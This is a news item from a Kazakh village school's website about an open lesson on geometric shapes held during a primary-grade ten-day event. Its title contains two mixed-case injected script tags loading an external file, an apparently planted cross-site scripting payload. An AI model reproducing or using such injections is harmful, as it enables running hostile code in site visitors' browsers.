Бастауыш сыныптардың онкүндігінің өтуі бойынша ақпарат. "Макинка а. ЖОББМ "КММ<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>
19.11.2021
«Макинка а. ЖОББМ» КММ-де Бастауыш сынып онкүндігінің аясында бекітілген жоспар бойынша мектепалды даярлық сыныпта ашық сабақ өткізілді. Ұйымдастырылған оқу қызметі: «Қарапайым математикалық ұғымдарды қалыптастыру», тақырыбы: «Дөңгелек, шаршы, тіктөртбұрыш, үшбұрыш». Жаңа сабақтың мақсаты: геометриялық пішіндер туралы түсінік беру, математикаға деген қызығушылықтарын тәрбиелеу, заттарды санына қарай салыстыру.
Ашық сабақта оқушылар келесі тапсырмаларды орындады: «Жұмбақ шешу», «Салыстыру», «1-10дейін тура және кері сана», «Көленкесін тап». Жаңа тақырыпқа қатысты оқушылар сұрақтарға жауап берді, пішіндердің қандай заттарға ұқсайтынын айтып сабақта алған білімдерін бекітті.
Просмотров: 593